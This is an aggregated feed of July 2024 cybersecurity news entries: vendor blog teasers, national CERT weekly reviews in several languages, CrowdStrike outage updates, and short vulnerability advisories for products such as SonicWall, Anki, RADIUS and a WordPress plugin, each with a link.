As regulations – like NIS2 – increasingly hold senior managers personally responsible for security breaches at critical infrastructure and industrial operations, C-level execs can no longer transfer security responsibility to their CISOs and wash their hands. While selection of cybersecurity products is usually outside the purview of the C-suite (except for the CISO), these execs […] The post How Senior Managers Can Transform Their Approach to OT Cybersecurity Product Selection appeared first on Radiflow.

https://www.radiflow.com/blog/how-senior-managers-can-transform-their-approach-to-ot-cybersecurity-product-selection/
Cato Networks Surpasses $200M ARR and 2,500 Customers: Here’s Why
2024-07-29T07:02:44Z | 1722236564

When Cato Networks was launched and we onboarded our first customers, we were exhilarated to share the disruptive innovation that has turned into an incredible opportunity. Enterprises had become too complex, with many point solutions requiring assessment, integration, deployment, and maintenance. Cato was the remedy to that complexity.   Nine years later, we’ve seen the... The post Cato Networks Surpasses $200M ARR and 2,500 Customers: Here’s Why appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-networks-surpasses-200m-arr-and-2500-customers/
Unlocking Simplicity in Network Security: The Cato Networks Story
2024-07-28T11:50:22Z | 1722167422

A vision born from complexity Most security companies grow reactively, a continuous, complex cycle of funding and building point solutions to address emerging point problems. Cato Networks chose to revisit and address two decades of accumulated complexities in networking and security infrastructures, looking to finally solve and break the point problem, point solution cycle. Cato... The post Unlocking Simplicity in Network Security: The Cato Networks Story appeared first on Cato Networks.

https://www.catonetworks.com/blog/unlocking-simplicity-in-network-security-the-cato-networks-story/
Planting Trees in India: Green Team #GenerationRestoration
2024-07-26T13:00:00Z | 1721998800

https://www.akamai.com/blog/sustainability/2024/jul/planting-trees-in-India-green-team
National Cyber Security Centre's weekly review – 30/2024
2024-07-26T11:52:49Z | 1721994769

This week we’ll cover topics such as the disruption caused by the CrowdStrike update and tips for using social media safely.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-302024
National Cyber Security Centre's weekly review – 30/2024
2024-07-26T11:52:49Z | 1721994769

This week we’ll cover topics such as the disruption caused by the CrowdStrike update and tips for using social media safely.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-302024
Latvian Cybersecurity and CERT.LV Technical Activities: Annual Report 2023
2024-07-26T08:19:52Z | 1721981992

This report contains generally available information about CERT.LV activities and operating results, excluding restricted-access information. This report is for information only.

https://cert.lv/en/2024/07/latvian-cybersecurity-and-cert-lv-technical-activities-annual-report-2023
Analyzing Malicious CrowdStrike Domains: Who Is Affected and What Could Come Next
2024-07-26T07:00:00Z | 1721977200

https://www.akamai.com/blog/security-research/2024/jul/2024-july-crowdstrike-bsod-domains-what-could-come-next
Security Alert (A24-07-23): Multiple Vulnerabilities in Microsoft Edge
2024-07-26T04:00:00Z | 1721966400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Secure64 is pleased to announce the release of their software on Redhat 9.4 to allow more choice for users of the Secure64 security ecosystem
2024-07-26T00:48:23Z | 1721954903

FORT COLLINS, Colo., July 24, 2024 /PRNewswire-PRWeb/ — Today, we release the following Secure64 platforms and solutions on Redhat Enterprise Linux version 9.4 and above. Version 6.1.1 of the following Secure64 applications are available today. Secure64 and Redhat a secure solution for Carriers and Enterprise to deliver Advanced Anti Malware, phishing, ransomware protection on top of the Secure64 […]

https://secure64.com/2024/07/26/secure64-is-pleased-to-announce-the-release-of-their-software-on-redhat-9-4/
SASE in Manufacturing
2024-07-25T13:05:19Z | 1721912719

The post SASE in Manufacturing appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-in-manufacturing/
Our crypto experts answer 10 key questions
2024-07-25T13:00:36Z | 1721912436

Cryptography is a fundamental part of electronics and the internet that helps secure credit cards, cell phones, web browsing (fingers crossed you’re using TLS!), and even top-secret military data. Cryptography is just as essential in the blockchain space, with blockchains like Ethereum depending on hashes, Merkle trees, and ECDSA signatures, among other […]

https://blog.trailofbits.com/2024/07/25/our-crypto-experts-answer-10-key-questions/
National Cyber Security Centre's weekly review – 29/2024
2024-07-25T12:00:00Z | 1721908800

This week, we'll cover topics such as the even faster exploitation of vulnerabilities and our participation at the Assembly event.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-292024
National Cyber Security Centre's weekly review – 29/2024
2024-07-25T12:00:00Z | 1721908800

This week, we'll cover topics such as the even faster exploitation of vulnerabilities and our participation at the Assembly event.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-292024
OT Security Patch Management
2024-07-25T08:00:00Z | 1721894400

In the world of OT, ensuring the security and reliability of systems is critical. Disruptions to critical processes can have severe consequences, impacting production, safety, and even environmental well-being. The focus on uptime may sometimes conflict with another essential aspect of OT security, patch management.

https://blog.scadafence.com/ot-security-patch-management
Uued abimaterjalid teevad ettevõttel infoturbega alustamise lihtsamaks
2024-07-25T07:01:53Z | 1721890913

Riigi Infosüsteemi Ametis (RIA) valminud infoturbe juhendmaterjalid aitavad ettevõtetel ja asutustel ära hoida nii küberrünnakute, andmelekete kui ka tehniliste probleemidega kaasnevat majanduslikku ja mainekahju.

https://ria.ee/uudised/uued-abimaterjalid-teevad-ettevottel-infoturbega-alustamise-lihtsamaks
How SASE Ensures Healthcare & Pharmaceutical Companies Thrive
2024-07-25T06:34:12Z | 1721889252

Healthcare and pharma companies are at the forefront of our most important need as humans: saving lives. To succeed, they require highly skilled staff members, medical equipment, drugs and resources. On top of these, there is another equally crucial component that will determine their ability to perform their jobs: their network. A secure, reliable and... The post How SASE Ensures Healthcare & Pharmaceutical Companies Thrive appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-sase-ensures-healthcare-pharmaceutical-companies-thrive/
Publicado Boletim n.º 2/2024 do Observatório de Cibersegurança
2024-07-25T00:00:00Z | 1721865600

O segundo Boletim de 2024 aborda a ciber-resiliência à escala europeia, destacando a proposta para o Cyber Resilience Act aprovada pelo Parlamento Europeu, que aguarda a adoção formal do Conselho da União Europeia para entrada em vigor. O regulamento tem como objetivo reduzir a exposição de organizações e consumidores ao crescente número de vulnerabilidades através da definição de novas regras que criam obrigações relativas ao tratamento, gestão e comunicação de vulnerabilidades, assim como assegurar o acesso a informação que facilite a utilização segura de produtos com elementos digitais.  Como é habitual, o Boletim partilha notícias e documentos considerados de interesse. Consulte o documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135883/publicado-boletim-n-22024-do-observatorio-de-ciberseguranca
National Cyber Security Centre's weekly review – 28/2024
2024-07-24T19:19:22Z | 1721848762

The Government has set up an investigation team to look into the data breach targeted at the City of Helsinki. We will go through what can be learned from the case.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-282024
National Cyber Security Centre's weekly review – 28/2024
2024-07-24T19:19:22Z | 1721848762

The Government has set up an investigation team to look into the data breach targeted at the City of Helsinki. We will go through what can be learned from the case.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-282024
The Whole is Bigger Than the Sum of its Parts. The Channel Experience
2024-07-24T13:10:23Z | 1721826623

Build Partner Trust. Avoid Partner Fatigue “Trust takes years to build, seconds to break, and forever to repair.” The road to becoming a trusted partner to your customers has no shortcuts. As you review your portfolio, filled with various network and IT security solutions you’ve accumulated over the years, you believe each fulfills the needs... The post The Whole is Bigger Than the Sum of its Parts. The Channel Experience appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-whole-is-bigger-than-the-sum-of-its-parts-the-channel-experience/
Security Alert (A24-07-22): Multiple Vulnerabilities in Google Chrome
2024-07-24T04:00:00Z | 1721793600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Atualização da informação: CNCS acompanha caso da falha informática de larga escala
2024-07-24T00:00:00Z | 1721779200

No âmbito do caso da falha informática de larga escala que ocorreu no dia 19 de julho, o Centro Nacional de Cibersegurança continua a acompanhar a situação, mantendo-se em contacto com os parceiros internacionais, nomeadamente a Rede Europeia de CSIRTs e o EU-Cyclone e tendo a panorâmica internacional atualizada. A nível nacional o CERT.PT contactou diretamente cerca de 500 entidades. Foram afetadas entidades em todos os setores abrangidos pela NIS: 35 diretamente, mas sem impacto na prestação de serviços essenciais; 143 indiretamente. Praticamente todas as entidades já recuperaram totalmente do incidente. Informação de 19 de julhoO Centro Nacional de Cibersegurança está a acompanhar o caso da falha informática global, havendo no ciberespaço nacional várias organizações afetadas, embora com diferentes graus de impacto. Até ao momento não há evidências que indiquem tratar-se de um ato malicioso. O CERT.PT está ativamente a contactar as entidades afetadas, oferecendo o suporte que for considerado necessário, tendo já sido comunicadas medidas de mitigação. Solicitamos, entretanto, que sejam prontamente reportadas a este serviço através do email cert@cert.pt e do número (+351) 210 497 399 eventuais situações relacionadas com este incidente. Mais informações sobre o Alerta CERT.PT em: https://dyn.cncs.gov.pt/pt/alerta-detalhe/art/135881/falha-critica-crowdstrikeAnálise do coordenador do Centro Nacional de Cibersegurança, Lino Santos, à falha informática global

https://dyn.cncs.gov.pt/pt/detalhe/art/135882/atualizacao-da-informacao-cncs-acompanha-caso-da-falha-informatica-de-larga-escala
Global Security Leaders Convene at FIRSTCON to Address Critical Infrastructure Threats
2024-07-24T00:00:00Z | 1721779200

Fukuoka, Japan - July 24, 2024 - The Forum of Incident Response and Security Teams (FIRST) recently concluded its intensive five-day conference, FIRSTCON 2024, held this year in Fukuoka.

https://www.first.org/newsroom/releases/20240724
Global Security Leaders Convene at FIRSTCON to Address Critical Infrastructure Threats
2024-07-24T00:00:00Z | 1721779200

Fukuoka, Japan - July 24, 2024 - The Forum of Incident Response and Security Teams (FIRST) recently concluded its intensive five-day conference, FIRSTCON 2024, held this year in Fukuoka.

https://www.first.org/newsroom/releases/20240724
RADIUS Protocol Forgery Vulnerability (Blast-RADIUS)
2024-07-23T08:09:46Z | 1721722186

In early July 2024, a group of security researchers found a vulnerability in the RADIUS protocol:CVE-2024-3596: RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by an on-path attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.The Blast-RADIUS attack enables a man-in-the-middle attacker between the RADIUS client and server to forge a valid protocol accept message in response to a failed authentication request. This forgery could allow the attacker to access network devices and services without needing to guess or brute-force passwords or shared secrets. The attacker does not gain access to user credentials.This vulnerability may impact any RADIUS client and server.SonicWall PSIRT is aware that a proof of concept (PoC) exploit for this vulnerability is publicly available, we have no information regarding any exploitation of this vulnerability in the wild. No malicious use of this vulnerability has been reported to SonicWall. CVE: CVE-2024-3596 Last updated: July 23, 2024, 8:09 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0014
NVIDIA GPU Compiler Driver Shader Functionality out-of-bounds read vulnerability
2024-07-23T00:00:00Z | 1721692800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1956
The Divine SASE Touch
2024-07-22T08:12:37Z | 1721635957

The Paris Olympics are coming up, arousing excitement and anticipation around the globe. As the world’s greatest athletes prepare to compete on this renowned stage, let’s shift our focus to a few of the earliest Olympics competitors – the Greek Gods. These deities, myth says, competed in the ancient Olympics, and later on, the Games... The post The Divine SASE Touch appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-divine-sase-touch/
Ankitects Anki Flask Invalid Path Reflected Cross-Site Scripting (XSS) vulnerability
2024-07-22T00:00:00Z | 1721606400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1995
Ankitects Anki LaTeX Blocklist Bypass vulnerability
2024-07-22T00:00:00Z | 1721606400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1994
Ankitects Anki Latex Incomplete Blocklist Vulnerability
2024-07-22T00:00:00Z | 1721606400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1992
Ankitects Anki MPV script injection vulnerability
2024-07-22T00:00:00Z | 1721606400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1993
Understanding the Election Cybersecurity Landscape
2024-07-22T00:00:00Z | 1721606400

GreyNoise is launching a multipart series on election cybersecurity. This series will cover the key threats and offer actionable steps to protect the integrity of our elections. Today, we start with an overview of the main risks and the adversaries involved. Stay tuned for insights on state-sponsored actors, phishing, social engineering, and the dangers of deepfakes and disinformation.

https://www.greynoise.io/blog/understanding-the-election-cybersecurity-landscape
Statement on major IT outage
2024-07-19T15:39:41Z | 1721403581

Following the global IT outage on Friday 19 July, affected organisations should put in place vendor mitigations. The NCSC is also warning about an increase in related phishing.

https://www.ncsc.gov.uk/news/major-it-outage
A Brief History of Graduality
2024-07-19T15:22:51Z | 1721402571

In the early hours of July 19th, 2024, CrowdStrike endpoints on Windows machines worldwide received a faulty content update, causing what is shaping up to be the one of the largest global IT outages to date. All over the world reports of Windows workstations and servers stuck in a boot loop with a BSOD were... The post A Brief History of Graduality appeared first on Cato Networks.

https://www.catonetworks.com/blog/brief-history-of-graduality/
Akamai Early Hints: A New Way for Improving User Experience and Core Web Vitals
2024-07-19T13:00:00Z | 1721394000

https://www.akamai.com/blog/performance/2024/jul/akamai-early-hints-improving-user-experience
High Threat Security Alert (A24-07-20): Multiple Vulnerabilities in Ivanti Products
2024-07-19T04:00:00Z | 1721361600

Ivanti has released security advisories to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-21): Multiple Vulnerabilities in Microsoft Edge
2024-07-19T04:00:00Z | 1721361600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-07-16): Multiple Vulnerabilities in Cisco Products
2024-07-18T04:00:00Z | 1721275200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-17): Multiple Vulnerabilities in Apache HTTP Server
2024-07-18T04:00:00Z | 1721275200

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-18): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2024)
2024-07-18T04:00:00Z | 1721275200

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-19): Multiple Vulnerabilities in SonicWall Products
2024-07-18T04:00:00Z | 1721275200

SonicWall released security advisories to address multiple vulnerabilities in SonicWall systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Consulta pública: Projeto de Regulamento de Execução que define requisitos de gestão dos riscos de cibersegurança
2024-07-18T00:00:00Z | 1721260800

Está disponível para consulta pública, aberta pela Comissão Europeia, até 25 de julho de 2024, o Projeto de Regulamento de execução que estabelece os requisitos técnicos e metodológicos das medidas de gestão dos riscos de cibersegurança e que especifica os casos em que um incidente deve ser considerado significativo, conforme previsto nos artigos 21.º e 23.º da Diretiva (UE) 2022/2555 do Parlamento Europeu e do Conselho, de 14 de dezembro de 2022, relativa a medidas destinadas a garantir um elevado nível comum de cibersegurança na União (Diretiva NIS 2). O Regulamento aplicar-se-á aos prestadores de serviços de DNS, aos registos de nomes de TLD, aos prestadores de serviços de computação em nuvem, aos prestadores de serviços de centro de dados, aos fornecedores de redes de distribuição de conteúdos, aos prestadores de serviços de confiança, aos prestadores de serviços geridos, aos prestadores de serviços de segurança geridos, bem como aos prestadores de serviços de mercados em linha, de motores de pesquisa em linha e de plataformas de serviços de redes sociais. A especificação de casos em que um incidente deve ser considerado significativo para os prestadores de serviços de confiança foi acrescentada, tendo em conta a natureza transfronteiriça das suas atividades. O Projeto de Regulamento pode ser consultado online na publicação oficial da Comissão Europeia, na qual estão disponíveis mais informações. Destinatários preferenciais da consulta pública Entidades abrangidas pelo Regulamento, designadamente: Setor das infraestruturas digitais: Prestadores de serviços de DNS, registos de nomes de TLD, Prestadores de serviços de computação em nuvem; Prestadores de serviços de centro de dados; Fornecedores de redes de distribuição de conteúdos; Prestadores de serviços de confiança. Setor da gestão de serviços TIC (entre empresas): Prestadores de serviços geridos; Prestadores de serviços de segurança geridos. Setor dos prestadores de serviços digitais: Prestadores de serviço de mercados em linha; Prestadores de serviço de motores de pesquisa em linha; Prestadores de serviço de plataformas de serviços de redes sociais. Outro tipo de entidades com relações de interesse com as entidades abrangidas pelo Regulamento, tais como clientes e fornecedores.

https://dyn.cncs.gov.pt/pt/detalhe/art/135880/consulta-publica-projeto-de-regulamento-de-execucao-que-define-requisitos-de-gestao-dos-riscos-de-ciberseguranca
Heap-based buffer overflow vulnerability in SonicOS IPSec VPN
2024-07-17T16:52:33Z | 1721235153

Heap-based buffer overflow vulnerability in the SonicOS IPSec allows an unauthenticated remote attacker to cause Denial of Service (DoS). CVE: CVE-2024-40764 Last updated: Aug. 5, 2024, 9:37 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0012
CVE-2024-38434
2024-07-17T13:12:00Z | 1721221920

CWE-676: Use of Potentially Dangerous Function may allow security feature bypass

https://claroty.com/team82/disclosure-dashboard/cve-2024-38434
CVE-2024-38435
2024-07-17T13:11:00Z | 1721221860

CWE-703: Improper Check or Handling of Exceptional Conditions may allow denial of service

https://claroty.com/team82/disclosure-dashboard/cve-2024-38435
SonicWall SMA100 NetExtender Windows Client Remote Code Execution Vulnerability
2024-07-17T08:15:00Z | 1721204100

Vulnerability in SonicWall SMA100 NetExtender Windows (32 and 64-bit) client 10.2.339 and earlier versions allows an attacker to arbitrary code execution when processing an EPC Client update.SonicWall strongly advises SSL VPN NetExtender client users to upgrade to the latest release version. IMPORTANT: This vulnerability does not affect SonicWall firewall (SonicOS) products. CVE: CVE-2024-29014 Last updated: July 18, 2024, 4:40 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0011
Riigiportaali eesti.ee ettevõtja digiväravasse lisandus kaks uut teenust
2024-07-17T06:28:49Z | 1721197729

Riigiportaalis eesti.ee saab nüüd kasutada kaht uut ettevõtjate tööd lihtsustavat teenust: ettevõtte finantseerimine ja tähtajalised kohustused.

https://ria.ee/uudised/riigiportaali-eestiee-ettevotja-digivaravasse-lisandus-kaks-uut-teenust
Security Alert (A24-07-15): Multiple Vulnerabilities in Google Chrome
2024-07-17T04:00:00Z | 1721188800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Linha Internet Segura e Polícia Judiciária reforçam cooperação
2024-07-17T00:00:00Z | 1721174400

A Linha Internet Segura, serviço integrado no Centro Internet Segura, coordenado pelo Centro Nacional de Cibersegurança, está na base da assinatura de um novo protocolo entre a Associação Portuguesa de Apoio à Vítima (APAV), e a Polícia Judiciária (PJ), um marco no sentido da sinalização de denúncias para os conteúdos de terrorismo online e incitamento à violência. Estreitar e aprofundar a colaboração entre a APAV, que coordena a Linha Linha Internet Segura, e a PJ, é o objetivo que conduz a uma resposta mais eficaz e coordenada para a proteção e assistência às vítimas de crime em Portugal. O protocolo, formalizado pelo presidente da APAV, João Lázaro, e pelo diretor Nacional da Polícia Judiciária, Luís Neves, visa estabelecer diretrizes de cooperação entre a PJ e a Linha Internet Segura, coordenada pela APAV, especificamente na vertente Hotline, dedicada à denúncia de conteúdos ilegais online. O objetivo passa por facilitar a transmissão de denúncias que possam envolver situações de discriminação, incitamento ao ódio e à violência, bem como conteúdo terrorista online, reforçando os esforços conjuntos para uma resposta mais eficaz e coordenada a estas problemáticas. O protocolo anterior abrangia a cooperação entre a APAV e a PJ, na área dos conteúdos de material de abuso sexual infantil (CSAM). O novo documento estreita relações e procedimentos com a Unidade Nacional de Combate ao Cibercrime e à Criminalidade Tecnológica (UNCT). A Linha Internet Segura é um serviço do Centro Internet Segura financiado pela União Europeia, que funciona nos dias úteis entre as 08h e as 22h, tendo como objetivos: prestar apoio telefónico ou online, de forma anónima e confidencial, através de um sistema que remete ocorrências graves às autoridades competentes, sempre que uma criança pareça estar em perigo; analisar, discutir e fornecer resultados que contribuam para as estratégias de sensibilização na área da Internet Segura.

https://dyn.cncs.gov.pt/pt/detalhe/art/135879/linha-internet-segura-e-policia-judiciaria-reforcam-cooperacao
Vectra AI and Google Chronicle SIEM: Investigate Threats with Speed and Confidence by Vectra AI Product Team
2024-07-17T00:00:00Z | 1721174400

Vectra AI and Google Chronicle SIEM work together to help security teams streamline threat investigations.

https://www.vectra.ai/blog/conduct-faster-context-driven-investigations-into-active-cyberattacks-with-vectra-and-chronicle
Current EU funding opportunities for the cybersecurity sector
2024-07-16T13:08:29Z | 1721135309

During July, several interesting EU funding opportunities will open up in the sector of cybersecurity. Funding opportunities are available to actors in the private, public and research sectors. Funding is granted for the introduction and use of new technologies, as well as for research, innovation and development activities.

https://www.kyberturvallisuuskeskus.fi/en/news/current-eu-funding-opportunities-cybersecurity-sector
Current EU funding opportunities for the cybersecurity sector
2024-07-16T13:08:29Z | 1721135309

During July, several interesting EU funding opportunities will open up in the sector of cybersecurity. Funding opportunities are available to actors in the private, public and research sectors. Funding is granted for the introduction and use of new technologies, as well as for research, innovation and development activities.

https://www.kyberturvallisuuskeskus.fi/en/news/current-eu-funding-opportunities-cybersecurity-sector
PCI DSS v4.0.1: Meeting New Client-Side Security Requirements
2024-07-16T13:00:00Z | 1721134800

Learn how Akamai Client-Side Protection & Compliance helps organizations meet the latest payment security updates and clarifications outlined in PCI DSS v4.0.1.

https://www.akamai.com/blog/security/2024/jul/pci-dss-v401-meeting-new-client-side-security-requirements
The Stuxnet Worm: A USB-based Attack with Major Consequences
2024-07-16T08:00:00Z | 1721116800

The convergence of IT and OT has unlocked unprecedented efficiency and productivity gains across various industries. However, this also makes OT networks increasingly vulnerable to cybersecurity threats. One significant attack vector that is often overlooked is the USB drive.

https://blog.scadafence.com/usb-borne-threats-ot-environments
High Threat Security Alert (A24-07-13): Vulnerability in Cisco Products
2024-07-16T04:00:00Z | 1721102400

Cisco released security advisories to address a remote code execution vulnerability (CVE-2024-6387) in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-14): Multiple Vulnerabilities in Juniper Networks Junos OS and Junos OS Evolved
2024-07-16T04:00:00Z | 1721102400

Juniper Networks has published security advisories to address multiple vulnerabilities in Junos OS and Junos OS Evolved.

https://www.govcert.gov.hk/en/alerts_detail.php
Get to know our MXDR analysts! by Zoey Chu
2024-07-16T00:00:00Z | 1721088000

Get an inside look at how Vectra MXDR analysts help customers respond to emerging security threats.

https://www.vectra.ai/blog/get-to-know-our-mxdr-analysts
Unauthenticated Privilege Escalation in Profile-Builder plugin
2024-07-15T16:29:52Z | 1721060992

During a routine audit of various WordPress plugins, we identified some issues in Profile Builder and Profile Builder Pro (50k+ active installs). We discovered an Unauthenticated Privilege Escalation Vulnerability which could allow attackers to gain administrative access without having any kind of account on the targeted site and perform unauthorized actions. This vulnerability was fixed on […]

https://wpscan.com/blog/unauthenticated-privilege-escalation-in-profile-builder-plugin/
Securing APIs While Navigating Today?s Booming API Economy
2024-07-15T15:00:00Z | 1721055600

https://www.akamai.com/blog/security/2024/jul/securing-apis-while-navigating-todays-booming-api-economy
Riasztás a Nemzeti Egészségbiztosítási Alapkezelő (NEAK) nevével visszaélő levelekkel kapcsolatban
2024-07-15T13:06:21Z | 1721048781

Tisztelt Ügyfelünk! A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Nemzeti Egészségbiztosítási Alapkezelő (NEAK) nevével visszaélő káros csatolmányt tartalmazó levelekkel kapcsolatban. Intézetünkhöz több állampolgári bejelentés is érkezett kéretlen, a Nemzeti Egészségbiztosítási Alapkezelőt megszemélyesítő káros csatolmányt tartalmazó üzenettel kapcsolatban. A levél káros csatolmányt tartalmaz, ezért kérjük, azt semmi esetre se nyissák meg! […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-a-nemzeti-egeszsegbiztositasi-alapkezelo-neak-nevevel-visszaelo-levelekkel-kapcsolatban/
I Need 90 PoPs of SASE…Stat!
2024-07-15T08:06:14Z | 1721030774

Healthcare information security teams are tasked with a common responsibility: safeguarding devices, services, and patient data; however, they also deal with the unique regulatory and compliance requirements surrounding patient data. Compounding this challenge is the sheer number of branch offices, connectivity to internal- and cloud-based applications, and all of the disparate point products accumulated over... The post I Need 90 PoPs of SASE…Stat! appeared first on Cato Networks.

https://www.catonetworks.com/blog/i-need-90-pops-of-sasestat/
19 Tips to Avoid Getting Hacked at Cyber Security Events by Lucie Cardiet
2024-07-14T00:00:00Z | 1720915200

Planning to attend a cybersecurity event? Stay secure with these 19 essential tips to protect yourself from getting hacked

https://www.vectra.ai/blog/survival-guide-being-secure-at-cybersecurity-events
Announcing AES-GEM (AES with Galois Extended Mode)
2024-07-12T13:00:35Z | 1720789235

Today, AES-GCM is one of two cipher modes used by TLS 1.3 (the other being ChaCha20-Poly1305) and the preferred method for encrypting data in FIPS-validated modules. But despite its overwhelming success, AES-GCM has been the root cause of some catastrophic failures: for example, Hanno Böck and Sean Devlin exploited nonce misuse to […]

https://blog.trailofbits.com/2024/07/12/announcing-aes-gem-aes-with-galois-extended-mode/
High Threat Security Alert (A24-07-11): Vulnerability in RADIUS protocol
2024-07-12T04:00:00Z | 1720756800

A critical privilege escalation vulnerability (CVE-2024-3596) was found in RADIUS network authentication protocol.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-07-12): Multiple Vulnerabilities in Palo Alto Products
2024-07-12T04:00:00Z | 1720756800

Palo Alto has published security advisories to address multiple vulnerabilities in PAN-OS, Expedition and Cortex XDR Agent.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai?s Perspective on July?s Patch Tuesday 2024
2024-07-11T19:00:00Z | 1720724400

Patches are raining down like Independence Day fireworks. July 2024?s Patch Tuesday has 137 total CVEs and one vulnerability found in the wild.

https://www.akamai.com/blog/security-research/2024/jul/akamai-perspective-on-july-patch-tuesday-2024
6 Tips for a Successful Security Vendor Consolidation
2024-07-11T13:00:00Z | 1720702800

https://www.akamai.com/blog/security/2024/jul/6-tips-successful-security-vendor-consolidation
Ten Steps for Protecting the OT Supply Chain Long-Term
2024-07-11T07:36:31Z | 1720683391

In our last blog, we discussed measures that operators can take to address supply chain security issues IMMEDIATELY. In this blog, we take a step back and recommend ten bigger-picture processes for protecting the OT supply chain long-term. Protecting the Operational Technology (OT) supply chain involves a comprehensive approach to ensure the security and resilience […] The post Ten Steps for Protecting the OT Supply Chain Long-Term appeared first on Radiflow.

https://www.radiflow.com/blog/ten-steps-for-protecting-the-ot-supply-chain-long-term/
High Threat Security Alert (A24-07-09): Multiple Vulnerabilities in GitLab
2024-07-11T04:00:00Z | 1720670400

GitLab has released 16.11.6, 17.0.4 and 17.1.2 to address multiple vulnerabilities in various versions of GitLab..

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-10): Multiple Vulnerabilities in Juniper Networks Junos OS and Junos OS Evolved
2024-07-11T04:00:00Z | 1720670400

Juniper Networks has published security advisories to address multiple vulnerabilities in Junos OS and Junos OS Evolved.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2024-4577 Exploits in the Wild One Day After Disclosure
2024-07-10T19:00:00Z | 1720638000

Akamai researchers have observed numerous exploit attempts for the PHP vulnerability CVE-2024-4577 as early as one day after disclosure.

https://www.akamai.com/blog/security-research/2024/jul/2024-php-exploit-cve-one-day-after-disclosure
Vulnerabilities in Phoniebox open-source project
2024-07-10T13:00:00Z | 1720616400

During its own research, CERT Polska has found 2 vulnerabilities (CVE-2024-3798 and CVE-2024-3799) in Phoniebox open-source project.

https://cert.pl/en/posts/2024/07/CVE-2024-3798/
NCSC Chief Engineer recognised in prestigious Women in Engineering awards
2024-07-10T11:45:02Z | 1720611902

The NCSC’s Chief Engineer has been named as one of the top 50 Women in Engineering at a prestigious awards ceremony.

https://www.ncsc.gov.uk/news/chief-engineer-receives-women-in-engineering-award
Juunikuu küberruumis: ründed häirisid autentimisteenuse ja kõrgkoolide tööd
2024-07-10T07:34:25Z | 1720596865

Riigi Infosüsteemi Ameti (RIA) juuni kokkuvõttest selgub, et möödunud kuul esines katkestusi tervise- ja sotsiaalvaldkonna e-teenustes ning küberründed tabasid teiste seas Smart-ID autentimislahendust ja kõrgkoole.

https://ria.ee/uudised/juunikuu-kuberruumis-runded-hairisid-autentimisteenuse-ja-korgkoolide-tood
High Threat Security Alert (A24-07-05): Multiple Vulnerabilities in Microsoft Products (July 2024)
2024-07-10T04:00:00Z | 1720584000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-06): Multiple Vulnerabilities in Firefox
2024-07-10T04:00:00Z | 1720584000

Mozilla has published the advisories (MFSA2024-29 and MFSA2024-30) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-07): Multiple Vulnerabilities in Citrix Products
2024-07-10T04:00:00Z | 1720584000

Citrix released security advisories to address multiple vulnerabilities in Citrix products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-07-08): Multiple Vulnerabilities in Fortinet Products
2024-07-10T04:00:00Z | 1720584000

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
CNCS no Cybersecurity Summer BootCamp
2024-07-10T00:00:00Z | 1720569600

